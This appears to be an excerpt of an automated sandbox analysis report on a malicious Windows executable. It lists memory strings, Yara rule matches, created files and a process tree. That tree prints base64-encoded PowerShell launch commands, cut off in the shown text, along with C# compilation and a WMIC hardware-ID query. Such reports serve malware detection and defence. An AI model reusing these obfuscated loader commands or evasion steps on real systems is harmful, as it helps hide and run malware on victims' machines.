      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#port-state
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#special-scheme
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://v8.dev/docs/stack-trace-api#stack-trace-collection-for-custom-exceptions.
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/FileAPI/
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://w3c.github.io/permissions/#permission-descriptor
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://w3c.github.io/permissions/#permission-registry
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://w3c.github.io/permissions/#permissionstatus
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://w3c.github.io/permissions/#status-of-a-permission
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://w3c.github.io/user-timing)
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://wicg.github.io/import-maps/
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2357438412.000001638FCCF000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2080784374.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2081890549.000001638FCC1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2073373495.000001638FCC1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2073373495.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2358901034.000001638FCE4000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2081890549.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2080784374.000001638FCC1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355062459.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2354104881.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2051442764.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2051442764.000001638FCC1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000002.2359924565.000001638FCCF000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2354239815.000001638FCCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://www.iana.org/assignments/uri-schemes/uri-schemes.xhtml
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://www.npmjs.com/package/tslib).
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rapidtables.com/convert/color/hsl-to-rgb.html
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49214
      Source: unknownNetwork traffic detected: HTTP traffic on port 49214 -> 443

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: Process Memory Space: powershell.exe PID: 5652, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 764, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeFile created: C:\WindowsTasksJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeFile created: C:\WindowsTasks\UpdatesJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeFile created: C:\WindowsTasks\PlatformJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848E859C43_2_00007FF848E859C4
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848E8D77C3_2_00007FF848E8D77C
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848E8D8053_2_00007FF848E8D805
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2047145702.00007FF67770C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEsqueleSquad.exeD vs dGhlYXB0Z3JvdXA=-free.exe
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: originalTextSpanoriginalFileNamecontextSpanoriginalContextSpanprefixTextsuffixTextstruct RenameLocationstruct RenameLocation with 8 elements vs dGhlYXB0Z3JvdXA=-free.exe
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: originalTextSpanoriginalFileNamecontextSpanoriginalContextSpanprefixTextsuffixTextstruct RenameLocationstruct RenameLocation with 8 elements_ vs dGhlYXB0Z3JvdXA=-free.exe
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: Commandline size = 3421
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: Commandline size = 3421
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: Commandline size = 3421Jump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: Commandline size = 3421Jump to behavior
      Source: Process Memory Space: powershell.exe PID: 5652, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 764, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: classification engineClassification label: mal72.expl.evad.winEXE@16/18@2/2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3176:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bzdhsljb.hpa.ps1Jump to behavior
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpMemory string: rustls::msgs::handshakeIllegal SNI hostname received
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: deno test src/v8-flags-help
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: Examples: https://github.com/WICG/import-maps#the-import-mapSet V8 command line options (for help: --v8-flags=--help)Watch for file changes and restart process automaticallyWatch for file changes and restart process automatically.
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: Examples: https://github.com/WICG/import-maps#the-import-mapSet V8 command line options (for help: --v8-flags=--help)Watch for file changes and restart process automaticallyWatch for file changes and restart process automatically.
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: Multi-address mappings are not yet supported
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeFile read: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe "C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe"
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAY
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9CB.tmp" "c:\Users\user\AppData\Local\Temp\at4aznwk\CSC4E83F948CA91455DAC7F3163ADDBB8D.TMP"
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAY
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE63E.tmp" "c:\Users\user\AppData\Local\Temp\f2b3v2t5\CSCCC5958D27FB74F62AE119AE083742021.TMP"
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get uuid /value
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYJump to behavior
